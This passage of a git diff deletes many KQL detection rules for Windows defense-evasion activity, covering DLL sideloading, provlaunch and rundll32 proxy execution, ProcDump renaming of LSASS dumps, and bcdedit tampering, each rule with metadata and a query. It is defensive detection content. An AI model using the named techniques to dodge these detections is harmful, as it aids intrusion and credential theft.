-| where (FolderPath endswith "\\arp.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\route.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\whoami.exe") and InitiatingProcessCommandLine endswith "msra.exe" and InitiatingProcessFolderPath endswith "\\msra.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution.kql b/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution.kql
deleted file mode 100644
index 65ae682e..00000000
--- a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023/08/08
-// Level: high
-// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "SOFTWARE\\Microsoft\\Provisioning\\Commands\\"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution_-_REG.kql b/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution_-_REG.kql
deleted file mode 100644
index 413eb321..00000000
--- a/Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution_-_REG.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/08/02
-// Level: high
-// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
-// Tags: attack.defense_evasion, attack.t1218
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Provisioning\\Commands"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Provlaunch.EXE_Binary_Proxy_Execution_Abuse.kql b/Defense Evasion/Potential_Provlaunch.EXE_Binary_Proxy_Execution_Abuse.kql
deleted file mode 100644
index 3d2de651..00000000
--- a/Defense Evasion/Potential_Provlaunch.EXE_Binary_Proxy_Execution_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023/08/08
-// Level: medium
-// Description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\provlaunch.exe" and (not(((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Qakbot_Registry_Activity.kql b/Defense Evasion/Potential_Qakbot_Registry_Activity.kql
deleted file mode 100644
index ad4f810d..00000000
--- a/Defense Evasion/Potential_Qakbot_Registry_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Hieu Tran
-// Date: 2023/03/13
-// Level: high
-// Description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Software\\firm\\soft\\Name"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql b/Defense Evasion/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql
deleted file mode 100644
index 0be2e25f..00000000
--- a/Defense Evasion/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @neu5ron
-// Date: 2019/02/07
-// Level: medium
-// Description: Detects potential malicious and unauthorized usage of bcdedit.exe
-// Tags: attack.defense_evasion, attack.t1070, attack.persistence, attack.t1542.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "delete" or ProcessCommandLine contains "deletevalue" or ProcessCommandLine contains "import" or ProcessCommandLine contains "safeboot" or ProcessCommandLine contains "network") and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Rcdll.DLL_Sideloading.kql b/Defense Evasion/Potential_Rcdll.DLL_Sideloading.kql
deleted file mode 100644
index dc23a7d8..00000000
--- a/Defense Evasion/Potential_Rcdll.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: high
-// Description: Detects potential DLL sideloading of rcdll.dll
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\rcdll.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql b/Defense Evasion/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql
deleted file mode 100644
index 6e6b74ac..00000000
--- a/Defense Evasion/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/30
-// Level: medium
-// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
-// Tags: attack.execution, attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ProcessCommandLine contains " -pr " and (FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Register_App.Vbs_LOLScript_Abuse.kql b/Defense Evasion/Potential_Register_App.Vbs_LOLScript_Abuse.kql
deleted file mode 100644
index aacb4100..00000000
--- a/Defense Evasion/Potential_Register_App.Vbs_LOLScript_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/11/05
-// Level: medium
-// Description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains ".vbs -register " and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Regsvr32_Commandline_Flag_Anomaly.kql b/Defense Evasion/Potential_Regsvr32_Commandline_Flag_Anomaly.kql
deleted file mode 100644
index c2b94749..00000000
--- a/Defense Evasion/Potential_Regsvr32_Commandline_Flag_Anomaly.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/07/13
-// Level: medium
-// Description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -i:" or ProcessCommandLine contains " /i:") and FolderPath endswith "\\regsvr32.exe") and (not(ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n "))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql b/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql
deleted file mode 100644
index fef361b2..00000000
--- a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: medium
-// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe" and FolderPath =~ "C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql b/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql
deleted file mode 100644
index 172b3879..00000000
--- a/Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: high
-// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe" and FolderPath endswith "\\RjvPlatform.dll") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_RoboForm.DLL_Sideloading.kql b/Defense Evasion/Potential_RoboForm.DLL_Sideloading.kql
deleted file mode 100644
index bd581c2f..00000000
--- a/Defense Evasion/Potential_RoboForm.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/14
-// Level: medium
-// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\roboform.dll" or FolderPath endswith "\\roboform-x64.dll") and (not(((InitiatingProcessFolderPath endswith "\\robotaskbaricon.exe" or InitiatingProcessFolderPath endswith "\\robotaskbaricon-x64.exe") and (InitiatingProcessFolderPath startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith " C:\\Program Files\\Siber Systems\\AI RoboForm\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Rundll32_Execution_With_DLL_Stored_In_ADS.kql b/Defense Evasion/Potential_Rundll32_Execution_With_DLL_Stored_In_ADS.kql
deleted file mode 100644
index a90ebb2b..00000000
--- a/Defense Evasion/Potential_Rundll32_Execution_With_DLL_Stored_In_ADS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Harjot Singh, '@cyb3rjy0t'
-// Date: 2023/01/21
-// Level: high
-// Description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Script_Proxy_Execution_Via_CL_Mutexverifiers.ps1.kql b/Defense Evasion/Potential_Script_Proxy_Execution_Via_CL_Mutexverifiers.ps1.kql
deleted file mode 100644
index 1bf5a890..00000000
--- a/Defense Evasion/Potential_Script_Proxy_Execution_Via_CL_Mutexverifiers.ps1.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113
-// Date: 2022/05/21
-// Level: medium
-// Description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -nologo -windowstyle minimized -file " and FolderPath endswith "\\powershell.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_ShellDispatch.DLL_Functionality_Abuse.kql b/Defense Evasion/Potential_ShellDispatch.DLL_Functionality_Abuse.kql
deleted file mode 100644
index 5c5ff61b..00000000
--- a/Defense Evasion/Potential_ShellDispatch.DLL_Functionality_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: medium
-// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "RunDll_ShellExecuteW" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_ShellDispatch.DLL_Sideloading.kql b/Defense Evasion/Potential_ShellDispatch.DLL_Sideloading.kql
deleted file mode 100644
index 5e537033..00000000
--- a/Defense Evasion/Potential_ShellDispatch.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: medium
-// Description: Detects potential DLL sideloading of "ShellDispatch.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellDispatch.dll" and (not(((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\") or FolderPath contains ":\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features.kql b/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features.kql
deleted file mode 100644
index dcb505a7..00000000
--- a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/11
-// Level: high
-// Description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "TurnOnDeveloperFeatures" and (FolderPath endswith "\\SystemSettingsAdminFlows.exe" or ProcessVersionInfoOriginalFileName =~ "SystemSettingsAdminFlows.EXE") and (ProcessCommandLine contains "DeveloperUnlock" or ProcessCommandLine contains "EnableSideloading")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features_-_Registry.kql b/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features_-_Registry.kql
deleted file mode 100644
index cf35cdc2..00000000
--- a/Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/12
-// Level: high
-// Description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\AppModelUnlock" or RegistryKey contains "\\Policies\\Microsoft\\Windows\\Appx") and (RegistryKey endswith "\\AllowAllTrustedApps" or RegistryKey endswith "\\AllowDevelopmentWithoutDevLicense")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_SmadHook.DLL_Sideloading.kql b/Defense Evasion/Potential_SmadHook.DLL_Sideloading.kql
deleted file mode 100644
index 83ffa4c6..00000000
--- a/Defense Evasion/Potential_SmadHook.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/01
-// Level: high
-// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\SmadHook32c.dll" or FolderPath endswith "\\SmadHook64c.dll") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe", "C:\\Program Files\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files\\SMADAV\\SmadavProtect64.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\SMADAV\\" or FolderPath startswith "C:\\Program Files\\SMADAV\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_SolidPDFCreator.DLL_Sideloading.kql b/Defense Evasion/Potential_SolidPDFCreator.DLL_Sideloading.kql
deleted file mode 100644
index fbd5181d..00000000
--- a/Defense Evasion/Potential_SolidPDFCreator.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/05/07
-// Level: medium
-// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\SolidPDFCreator.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\" or FolderPath startswith "C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\") and InitiatingProcessFolderPath endswith "\\SolidPDFCreator.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Defense Evasion/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Defense Evasion/Potential_Suspicious_Activity_Using_SeCEdit.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Suspicious_Mofcomp_Execution.kql b/Defense Evasion/Potential_Suspicious_Mofcomp_Execution.kql
deleted file mode 100644
index 8c70124d..00000000
--- a/Defense Evasion/Potential_Suspicious_Mofcomp_Execution.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/12
-// Level: high
-// Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.
-The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
-Attackers abuse this utility to install malicious MOF scripts
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%")) and (FolderPath endswith "\\mofcomp.exe" or ProcessVersionInfoOriginalFileName =~ "mofcomp.exe")) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"))) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Suspicious_Registry_File_Imported_Via_Reg.EXE.kql b/Defense Evasion/Potential_Suspicious_Registry_File_Imported_Via_Reg.EXE.kql
deleted file mode 100644
index d95b611c..00000000
--- a/Defense Evasion/Potential_Suspicious_Registry_File_Imported_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/08/01
-// Level: medium
-// Description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
-// Tags: attack.t1112, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains " import " and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\" or ProcessCommandLine contains "C:\\ProgramData\\")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Suspicious_Windows_Feature_Enabled_-_ProcCreation.kql b/Defense Evasion/Potential_Suspicious_Windows_Feature_Enabled_-_ProcCreation.kql
deleted file mode 100644
index 4bfe12e2..00000000
--- a/Defense Evasion/Potential_Suspicious_Windows_Feature_Enabled_-_ProcCreation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/29
-// Level: medium
-// Description: Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
-Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
-
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Enable-WindowsOptionalFeature" and ProcessCommandLine contains "-Online" and ProcessCommandLine contains "-FeatureName") and (ProcessCommandLine contains "TelnetServer" or ProcessCommandLine contains "Internet-Explorer-Optional-amd64" or ProcessCommandLine contains "TFTP" or ProcessCommandLine contains "SMB1Protocol" or ProcessCommandLine contains "Client-ProjFS" or ProcessCommandLine contains "Microsoft-Windows-Subsystem-Linux")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_SysInternals_ProcDump_Evasion.kql b/Defense Evasion/Potential_SysInternals_ProcDump_Evasion.kql
deleted file mode 100644
index 5269be55..00000000
--- a/Defense Evasion/Potential_SysInternals_ProcDump_Evasion.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/11
-// Level: high
-// Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "copy procdump" or ProcessCommandLine contains "move procdump") or ((ProcessCommandLine contains "2.dmp" or ProcessCommandLine contains "lsass" or ProcessCommandLine contains "out.dmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains ".dmp ")) or (ProcessCommandLine contains "copy lsass.exe_" or ProcessCommandLine contains "move lsass.exe_")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql b/Defense Evasion/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
deleted file mode 100644
index 1884165c..00000000
--- a/Defense Evasion/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/14
-// Level: high
-// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith 
"\\d3d10.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\eappcfg.dll" or 
